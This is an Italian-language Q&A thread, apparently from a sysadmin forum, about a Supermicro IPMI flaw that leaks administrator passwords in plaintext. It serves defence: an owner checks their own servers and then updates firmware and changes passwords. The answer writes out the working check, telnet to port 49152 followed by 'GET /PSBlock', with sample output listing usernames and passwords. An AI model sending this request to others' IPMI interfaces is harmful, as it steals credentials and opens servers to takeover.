Ho alcuni server Supermicro con IPMI in esecuzione e, come descritto in questo blog ( http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras ) c'è una vulnerabilità critica a ottenere password di amministratore in chiaro da qualsiasi posizione remota.
Come verificare se la mia scheda madre del server è compromessa?
Risposte:
Telnet semplicemente all'indirizzo IP IPMI nella porta 49152 ed eseguire una richiesta GET specifica. Dovresti ottenere i tuoi utenti e password se sei compromesso.
telnet server.example.com 49152
Dopo che la connessione richiede GET /PSBlocke osserva i risultati, dovrebbe essere qualcosa del genere:
Trying 192.168.1.22...
Connected to server.example.com.
Escape character is '^]'.
GET /PSBlock
Risposta:
=%}?
0adminADMIN**yourPlaintextPasswordHere**;TTroot**AnotherPassword**???%?v?i?o???DDD@??
Per risolvere questo problema, aggiornare il firmware IPMI all'ultima versione. Il firmware è specifico per il tuo controller IPMI, quindi dovresti ottenere quello specificato nel sito Web Supermicro.
Quindi, dopo aver aggiornato il firmware, modificare le password .